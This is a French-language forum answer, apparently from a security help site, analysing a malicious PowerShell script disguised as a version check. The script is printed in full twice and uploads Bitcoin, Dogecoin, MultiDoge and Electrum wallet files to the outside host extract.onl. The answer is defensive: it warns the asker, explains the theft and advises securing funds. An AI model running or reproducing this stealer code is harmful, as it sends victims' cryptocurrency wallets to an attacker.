AVERTISSEMENT : NE PAS EXÉCUTER LE CODE DE CETTE RÉPONSE. IL EST MALVEILLANT ET N'EST INCLUS QU'À DES FINS DE DÉMONSTRATION.
powershell.software/versioncheck est un lien malveillant
La page vers laquelle il mène ressemble à ceci :
$ErrorActionPreference = 'silentlycontinue'
Write-Host "Vérification de la dernière version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "Vous utilisez actuellement 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum
body {
background-color: black;
}
Lorsque vous essayez de visiter ce lien dans un navigateur, il vous redirige rapidement loin de cette page, vers une autre page prétendant (mal) que le site n'existe pas :
Lorsqu'exécuté dans la commande complète que vous avez fournie, cependant, il reconnaît les lignes suivantes comme des commandes PowerShell :
$ErrorActionPreference = 'silentlycontinue'
Write-Host "Vérification de la dernière version..."
Invoke-RestMethod -method PUT -infile ~\desktop\backups\found.wallet extract.onl/logs
Invoke-RestMethod -method PUT -infile .\found.wallet extract.onl/desktop
Invoke-RestMethod -method PUT -infile .\multidoge.wallet extract.onl/seed
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Dogecoin\wallet.dat extract.onl/doge
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Bitcoin\wallet.dat extract.onl/bitcoin
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge.wallet extract.onl/multidoge/wallet
Compress-Archive -Path ~\Appdata\Roaming\MultiDoge\multidoge-data -DestinationPath ~\Appdata\Roaming\MultiDoge\multidoge-data
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\MultiDoge\multidoge-data.zip extract.onl/multidoge/backups
Write-Host "Vous utilisez actuellement 7.1.4 Windows PowerShell, Java 2021"
Invoke-RestMethod -method PUT -infile ~\Appdata\Roaming\Electrum\wallets\default_wallet extract.onl/electrum
C'est un voleur de portefeuille de cryptomonnaie primitif. Chaque ligne commençant par Invoke-RestMethod tente d'envoyer des données provenant d'autres portefeuilles de cryptomonnaie possibles (si vous en avez installé sur votre ordinateur) vers une page sur le point de terminaison http://extract.onl.
Si vous avez des portefeuilles de cryptomonnaie sur l'ordinateur, ils sont maintenant probablement compromis. Transférez tout ce qu'ils contiennent vers un autre portefeuille SÉCURISÉ.
Résumant vos préoccupations :
J'ai l'impression qu'ils n'ont téléchargé que quelques fichiers de mon système.
Mais je crains qu'il puisse rester une porte dérobée en fonctionnement sur mon système. Le téléchargement, je peux vivre avec, mais pas une porte dérobée.
Oui, si ces fichiers sur votre ordinateur existaient, ils ont été téléchargés. Cependant, c'est tout ce que ce script semble faire, donc il n'y a pas de porte dérobée persistante laissée sur votre système.
Édition 25/10/2021 :
Depuis la rédaction de cette réponse, l'accès au code malveillant à l'adresse powershell.software/versioncheck est maintenant bloqué (et entraîne désormais une erreur 403), mais pourrait revenir à tout moment. C'est toujours un risque.
Édition 24/01/2022 :
Le propriétaire de powershell.software/versioncheck a remis en ligne le code malveillant. C'est toujours un risque.
